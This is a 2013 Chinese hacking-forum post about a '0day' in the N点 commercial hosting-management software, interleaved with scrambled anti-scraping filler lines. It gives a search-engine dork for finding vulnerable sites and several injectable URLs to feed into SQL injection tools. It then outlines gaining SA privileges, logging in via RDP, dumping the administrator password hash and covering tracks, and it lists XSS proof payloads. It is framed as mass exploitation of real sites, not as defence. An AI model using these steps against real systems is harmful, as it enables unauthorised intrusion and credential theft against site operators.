中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
7 X/ t G) E0 V. X
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
# t; B7 w/ j U4 p" T
好吧 抱怨一下就行了 接下来关键的时候到了
; `4 l# ~* H9 t% Q( c
首先百度搜索关键字:inurl: (mmdatabase.asp)
, N, P; i5 [( s" l4 B) R6 O2 `" {
我随便列举一个:
www.xxxx.com
% d X: T- Z! z) l
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
9 z, D( J% f8 H4 z' L9 m# ~$ F
扔入NBSI 或者啊D等各种傻逼工具后
) n: Z4 y- x8 m1 S8 N- a) Z
你们会看到是SA权限
5 u! Z% t* O; ]* Y. N5 ~$ U
果断3389 上去 hash得到administrator密码
' d4 E8 H* ]( _6 F# h+ c
擦屁股走人~
/ }: z: j) w" t7 k& I
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
+ g% _ p3 A4 Y0 @6 h2 I. j7 G; q% ^
9 Z2 u9 m; c) f* O
再附上其他几个漏洞页面
/ ?" R5 O/ Y' U
SQL:
1 d0 }5 R3 r' I
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
3 C+ M% q, k: P1 M/ _ A+ a
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
" u8 w, p5 N! m: Y
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
% x, X3 s4 a* \! V6 u5 A
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
/ F L" a% H. n: b4 J
XSS证明:
. |: q, H; N# J; ?9 ?; b. j
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
3 }6 q, v R$ [- h7 @, }. m/ U1 u' Y
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
0 S' R2 ~ n6 j, \
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
$ O- Z: e9 Z+ A' q$ x
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
* T: E8 s/ B6 n
还是星外吧 你们懂的
& F0 K* E4 V% P4 I0 b* f
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
; ^$ b/ H, K- V8 `- C% G; Z+ R" \
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
0 ~% W' T5 X; d0 N( a% A- k
——-
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2